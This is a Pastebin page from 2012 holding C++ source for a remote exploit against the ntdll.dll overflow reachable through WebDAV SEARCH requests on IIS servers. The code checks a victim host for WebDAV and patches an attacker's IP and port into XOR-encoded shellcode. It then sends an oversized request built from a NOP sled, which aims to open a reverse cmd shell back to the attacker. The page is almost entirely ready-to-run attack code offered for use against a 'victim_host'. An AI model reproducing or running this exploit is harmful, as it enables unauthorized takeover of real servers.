API tools faq
paste
emS-St1ks

webDav modify version remote

emS-St1ks
Jun 14th, 2012
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 5.97 KB | None | 0 0
raw download clone embed print report
  1. #include <winsock.h>
  2. #include <windows.h>
  3. #include <stdio.h>
  4.  
  5. #pragma comment (lib,"ws2_32")
  6.  
  7. char shellc0de[] =
  8. "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
  9. "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
  10. "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
  11. "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
  12. "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
  13. "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
  14. "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
  15. "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
  16. "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
  17. "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
  18. "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
  19. "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
  20. "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
  21. "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
  22. "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
  23. "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
  24. "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
  25. "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
  26. "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
  27. "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
  28. "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
  29. "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
  30. "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
  31. "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
  32. "\xff\xd0"
  33. "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
  34. "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
  35. "cmd" // don't change anything..
  36. "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
  37. "\x00\x00\xe8\x77"
  38. "\x00\x00\xf0\x77"
  39. "\x00\x00\xe4\x77"
  40. "\x00\x88\x3e\x04" // win2k3
  41. "\x00\x00\xf7\xbf" // win9x =P
  42. "\xff\xff\xff\xff";
  43.  
  44. int test_host(char *host)
  45. {
  46. char search[100]="";
  47. int sock;
  48. struct hostent *heh;
  49. struct sockaddr_in hmm;
  50. char buf[100] ="";
  51.  
  52. if(strlen(host)>60) {
  53. printf("error: victim host too long.\r\n");
  54. return 1;
  55. }
  56.  
  57. if ((heh = gethostbyname(host))==0){
  58. printf("error: can't resolve '%s'",host);
  59. return 1;
  60. }
  61.  
  62. sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
  63. hmm.sin_port = htons(80);
  64. hmm.sin_family = AF_INET;
  65. hmm.sin_addr = *((struct in_addr *)heh->h_addr);
  66.  
  67. if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  68. printf("error: can't create socket");
  69. return 1;
  70. }
  71.  
  72. printf("Checking WebDav on '%s' ... ",host);
  73.  
  74. if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
  75. printf("CONNECTING_ERROR\r\n");
  76. return 1;
  77. }
  78. send(sock,search,strlen(search),0);
  79. recv(sock,buf,sizeof(buf),0);
  80. if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
  81. return 0;
  82. printf("NOT FOUND\r\n");
  83. return 1;
  84. }
  85.  
  86. void help(char *program)
  87. {
  88. printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
  89. return;
  90. }
  91.  
  92. void banner(void)
  93. {
  94. printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
  95. [Crpt]\r\n");
  96. printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
  97. return;
  98. }
  99.  
  100. void main(int argc, char *argv[])
  101. {
  102. WSADATA wsaData;
  103. unsigned short port=0;
  104. char *port_to_shell="", *ip1="", data[50]="";
  105. unsigned int i,j;
  106. unsigned int ip = 0 ;
  107. int s, PAD=0x10;
  108. struct hostent *he;
  109. struct sockaddr_in crpt;
  110. char buffer[65536] ="";
  111. char request[80000]; // huuuh, what a mess! :)
  112. char content[] =
  113. "<?xml version=\"1.0\"?>\r\n"
  114. "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  115. "<g:sql>\r\n"
  116. "Select \"DAV:displayname\" from scope()\r\n"
  117. "</g:sql>\r\n"
  118. "</g:searchrequest>\r\n";
  119.  
  120. banner();
  121. if((argc<4)||(argc>5)) {
  122. help(argv[0]);
  123. return;
  124. }
  125.  
  126. if(WSAStartup(0x0101,&wsaData)!=0) {
  127. printf("error starting winsock..");
  128. return;
  129. }
  130.  
  131. if(test_host(argv[1]))
  132. return;
  133.  
  134. if(argc==5)
  135. PAD+=atoi(argv[4]);
  136.  
  137. printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
  138.  
  139. ip = inet_addr(argv[2]); ip1 = (char*)&ip;
  140.  
  141. shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
  142. shellc0de[451]=ip1[3];
  143.  
  144. port = htons(atoi(argv[3]));
  145. port_to_shell = (char *) &port;
  146. shellc0de[446]=port_to_shell[0];
  147. shellc0de[447]=port_to_shell[1];
  148.  
  149. // we xor the shellcode [xored by 0x95 to avoid bad chars]
  150. __asm {
  151. lea eax, shellc0de
  152. add eax, 0x34
  153. xor ecx, ecx
  154. mov cx, 0x1b0
  155. wah:
  156. xor byte ptr[eax], 0x95
  157. inc eax
  158. loop wah
  159. }
  160.  
  161. if ((he = gethostbyname(argv[1]))==0){
  162. printf("error: can't resolve '%s'",argv[1]);
  163. return;
  164. }
  165.  
  166. crpt.sin_port = htons(80);
  167. crpt.sin_family = AF_INET;
  168. crpt.sin_addr = *((struct in_addr *)he->h_addr);
  169.  
  170. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  171. printf("error: can't create socket");
  172. return;
  173. }
  174.  
  175. printf("Connecting... ");
  176.  
  177. if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
  178. printf("ERROR\r\n");
  179. return;
  180. }
  181. // No Operation.
  182. for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
  183. // fill the buffer with the shellcode
  184. for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
  185. // well..it is not necessary..
  186. for(i=0;i<2500;buffer[i]=PAD,i++);
  187.  
  188. /* we can simply put our ret in this 2 offsets.. */
  189. //buffer[2086]=PAD;
  190. //buffer[2085]=PAD;
  191.  
  192. buffer[sizeof(buffer)]=0x00;
  193. memset(request,0,sizeof(request));
  194. memset(data,0,sizeof(data));
  195. sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
  196. sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
  197. printf("CONNECTED\r\nSending evil request... ");
  198. send(s,request,strlen(request),0);
  199. send(s,content,strlen(content),0);
  200. printf("SENT\r\n");
  201. recv(s,data,sizeof(data),0);
  202. if(data[0]!=0x00) {
  203. printf("Server seems to be patched.\r\n");
  204. printf("data: %s\r\n",data);
  205. } else
  206. printf("Now if you are lucky you will get a shell.\r\n");
  207. closesocket(s);
  208. return;
  209. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!